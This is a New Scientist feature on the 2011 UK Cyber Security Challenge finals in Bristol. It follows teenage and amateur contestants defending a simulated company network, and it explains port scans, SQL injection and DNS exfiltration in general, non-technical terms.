Who will protect your money, your identity and your secrets from hackers? New Scientist joins a bunch of hopefuls to find out if they're up to the task
5 March 2011, 10:59:59
Time remaining 00:50:00
In a quiet, windowless auditorium in Bristol, in the west of England, Lucy Robson and her team hunch over their laptops as the seconds on a giant clock above begin to count down. In a few moments, the enemy will begin the attack – but these villains won't be coming in through the doors.
Robson is competing in the finals of the UK Cyber Security Challenge, held at Hewlett-Packard Labs in Bristol. The participants, largely teenagers and amateur programmers, have been plucked from outside the cybersecurity industry. The hunt is on to find a new generation of people with the skills to battle the darkest elements of the online realm – the hackers who seize government secrets, anonymous activists bent on causing mayhem, and criminals stealing credit cards.
The industry needs fresh blood because the nature of the threat has changed. "Five to ten years ago, you'd be protecting against a clever kid who wants to deface a website," says Martin Sadler of HP Labs. That kind of unsophisticated attack was once relatively easy to thwart. But those days are over. Take the hackers who broke into the Sony PlayStation Network earlier this year. They breezed past the security measures of one the world's biggest electronics companies to steal the names, addresses and possibly credit card numbers of over 100 million people. Sony had barely recovered when a different part of the company came under attack last week.
Hackers are no longer motivated by mischief alone but by big money. Cybercrime alone – including stolen credit card numbers and industrial espionage – now costs the UK £27 billion a year, according to the government's Office of Cyber Security and Information Assurance. The story is no different in other parts of the world.
At the same time, new forms of illegal online activism have grown up, with a collective called Anonymous at the vanguard, crippling websites and gleefully exposing secrets. "Anonymous is not a specific group that you can go and arrest," one of the competition judges explains. The label masks an ever-shifting informal membership who might be active for a year, or for 3 hours. "It's a bank manager who wants to be a bad guy for the day," he says. "You can't punch someone in the face on the street, but you can on the web."
While the diversity, motivation and acumen of the bad guys may have grown exponentially, the defenders are struggling to keep up. Pure technical acumen doesn't cut it any more. The current crop of cybersecurity professionals badly need to up their game. The Cyber Security Challenge, if not an act of desperation, is certainly one of necessity.
Last year about 4000 people entered the competition hoping to be crowned ultimate cybersecurity champion. Today, after a series of gruelling heats, only 30 remain. To the winners will go expensive training courses and internships. But the real beneficiaries might be the sponsors. They include security firm Sophos, defence contractor Qinetiq, and the UK government's Defence Science and Technology Laboratory, and they are treating this contest as a scouting operation.
Earlier, the contenders got their orders from the fake CEO and board members of a fake manufacturing firm called the Metal Box Company. Today's task, they were told, was to secure the firm's website and network. Then the finalists were split into teams with names like Enigma, Turing and Bombe.
They are about to start the first of the day's trials that will test their technical abilities, interpersonal skills and teamwork. Later on, judges will award two prizes: one to the winning team, the other to the best individual player. Entrants vying for the title include a professional actor, a geeky kid with hair down to his shoulders, a postman from northern England and, competing in Team Enigma, 17-year-old Robson, the contest's only girl.
Robson taught herself network security by reading Wikipedia and textbooks she bought with money she earned from a part-time supermarket job. "If it affects me, I want to know how it works," she says. She lives in Cromer, a small town on the east coast of England, with her dad, a carpet fitter and her mum, a certified chartered accountant. "Make sure you get the 'certified chartered' bit, it's important," Robson instructs. She speaks as if she's processing every word before it emerges. Her cropped dark hair rests on the collar of a grey suit and a fashionable scarf. The other entrants wear T-shirts and jeans.
Robson entered the competition with two friends she met at a computer summer school. In the run-up to the finals, their team shone, sussing out well-disguised flaws in a home computer. "We got here because of Lucy," says her friend Stuart Rennie. "She was amazing." But today, Rennie has been placed on Team Bombe, competing against Robson.
It's 11 am, and the attack is about to start. The task is to identify and fend off waves of invaders who want to break into the Metal Box Company's computer network. The teams are clustered in one corner of the auditorium, isolated from each other by barriers. The wires trailing from their laptops disappear into a tangled clump under a nearby table, where the action is coordinated by the games masters, led by Andrew Laird of Bristol-based security firm Cassidian. The exercise is being staged on a Cassidian-built software simulator called Hotsim (for "Hands on Training Simulator"), which is robust enough to manage the cybersecurity training of the Brazilian and Finnish militaries. Hotsim reproduces all the day-to-day traffic you'd expect in a big company network, such as employees browsing the internet, instant messaging and exchanging emails, so the teams' laptop screens mirror what an IT security team in a real company would be looking at.
The competing teams monitor this virtual traffic for signs of intrusion, using standard programs that display employee activity, a breach detection system and a firewall to keep out threats. A skilful cyberdefender knows how to program these tools to spot and block threats. If the contenders can successfully juggle all three, they can prevent the invasion.
Team Enigma, though, start badly. It's only a few minutes before the first sign of trouble: a "port scan" conducted by the enemy. Ports are the way into the network. Think of an arterial road system into a city that provides hundreds or thousands of routes for different types of vehicles and destinations. Similarly, a network has many thousands of specific routes along which traffic travels, called ports. By convention, internet browser traffic on a server comes in through port 80. Email tends to go out of port 25. Potential intruders will scan thousands of these ports in an attempt to discover weaknesses in the network's security. That's what is happening now, but in their initial scramble to secure the perimeter neither Robson nor the rest of Team Enigma have noticed.
The person in charge of monitoring the traffic zipping around on the network router is Tony Shannon, a stocky, confident 28-year-old with a pierced eyebrow. After a few years in the IT industry, he's back studying computer security at Nottingham Trent University, UK. Shannon's style is nothing like Robson's. He has decided that the way to impress the judges is to mount ostentatious vocal displays. "Oh yeah, we're FUBAR," he declares, as thing start to come unstuck. "We're folding like a cheap deckchair." And the team really is folding in the face of the attacks. For all his earlier bravado, Shannon hasn't found much to contribute so far. There's anxiety in his voice.
Time remaining 00:31:20
Twenty minutes in, and the Metal Box Company website has been hacked. The home page has been replaced by a simple message: "Pwned by /b", followed by a stream of Latin. When you're pwned, you're conquered, goes the web slang.
Team Enigma manages to restore the home page, but they are missing crucial information: if they can't figure out how the attackers got in, their fix is only temporary. Further investigation reveals that the hacker has used a method called SQL injection vulnerability. SQL is a language used on websites to extract information from a database. Many online retailers draw on such databases to update, in real time, the stock of products they display, as well as customer details. SQL automates the retrieval of that information and so makes web designers' lives easier. But if the websites are badly designed, hackers can turn SQL on itself to break in and steal information. Consider the forms you use to fill in your name, address and credit card details on a website: every one of these can potentially be a door to a website's inner sanctum.
Team Enigma suspect that the attacker entered via one of these forms by submitting malicious code posing a deliberately inexact query to the database. The shoddily built Metal Box Company website then failed to block that query. That allowed the hacker to force the website to reveal what should have been hidden database information. That's probably how the attacker stole the password that was then used to deface the website.
Time remaining 00:13:19
Things are getting serious. Until now, the attacks have been simple vandalism, but now the Metal Box hackers have set loose a particularly nasty piece of malware that hunts down pass-words, financial statements and sensitive personal information. That kind of data can be embarrassingly easy for a malware program to find. An email or document with the word "confidential" at the top, says Laird, "is like a flag saying 'Hey, I'm interesting' ".
Its quarry identified, the malware is now chopping up the documents into tiny segments, and encrypting them. To sneak its swag out of the network unnoticed, the malware hides all these fragments inside messages known as domain name server queries. These queries are normally sent out of the network any time someone connects to an outside server. When you search for, say, newscientist.com, your web browser sends a request to a server that translates the text-based web address "newscientist.com" into its real address, which is a long and unmemorable string of numbers. Because these queries form a large part of normal web traffic on an internal network, it is easy to hide bits of extra information inside them without arousing suspicion. The malware can therefore idly transmit the segments of encrypted data inside thousands of these outbound DNS queries. Once they have been safely smuggled out of the network, the attacker can simply reassemble the pieces at their destination. This type of attack is called "DNS exfiltration".
The US government estimates that data exfiltration has caused government departments and agency networks to lose more than 20 terabytes of data, but because the thieves encrypted what they stole, it's hard to tell what was lost. "They don't know what it is and they don't know where it's gone," says Laird. It's the perfect heist.
Team Enigma have failed to spot the breach, and the Metal Box Company is haemorrhaging data: over 2000 documents have left the network. Robson, who is normally calm, seems harassed, furiously logging details of the attacks, while the others try to track down what's happening. The airless room is claustrophobic with the shouts of the teams, and there's a smell of nervous sweat. By the time the team spot the DNS theft, it's too late.
Time remaining 00:02:58
The Hotsim attackers have barred all the company's employees from accessing their own user accounts, including the security team. If you have ever entered the wrong password three times in a row and been locked out of your account, you'll know how this works. This attack is usually a decoy for staging a more serious theft, but today it's more like a final taunt.
"Take your hands off your keyboards," says games master Laird. The teams lean back on their chairs. They look dazed. "My head hurts," says Robson. Shannon stares at the clock.
Robson, Shannon and the others have had their first taste of what the good guys are up against. All over the world, cybersecurity specialists are under siege. They don't know when the next attack will arrive, or why.
6 March 2011, 13:30:00
The organisers are about to announce the winners at the awards ceremony lunch, being held in a fancier venue in Bristol. It's a fresh, wintry Sunday, and the sunlight glints on the cutlery and glasses.
Team Enigma haven't won the overall prize. That went to Team Bombe, which included the competition winner, Dan Summers, the postman. But Team Enigma are in good spirits.
Up on stage, Robson accepts an award for her performance in the heats that brought her to the final competition, a coveted digital security internship with Qinetiq. Even Shannon is in a good mood, having won a training course. "I'll stop grinning sometime in my sleep tonight," he says. As the ceremony winds down inside the hall, Robson is outside, texting on her phone. Next year, she'll be studying computer science at university, or perhaps she'll take a gap year.
Meanwhile, someone, somewhere is plugging into the vast web of cables, processors and servers joined up around the planet. And they're up to no good.
Virtual crime, real world
It's 2020, and you are lost in an unfamiliar neighbourhood because you were trying to avoid congestion on the main roads. But you're not worried: you are being led to a clear stretch of road by your car's navigation system, which is chatting with billions of sensors embedded into the roads to avoid traffic snarls. But can you trust your satnav? If hackers can break into a website, they can also make short work of this network of sensors and cause mischief on a city-wide scale, misdirecting cars for kicks, perhaps down a side street where someone is waiting to rob you.
If the scenario seems unlikely, consider that billions of networked sensors will soon become embedded throughout our cities and possessions, generating a flood of information about you and your surroundings. Gigabytes of sensitive data will circulate through this "internet of things", a global network of interconnected and continually monitored objects.
"This world of sensors will create new problems," says Martin Sadler of Hewlett-Packard Labs in Bristol, UK. Clearly, it will need a completely different kind of custodian to protect it from falling into the wrong hands, he says. Time to start training the next generation of cyberdefenders.
Richard Fisher is a technology features editor at New Scientist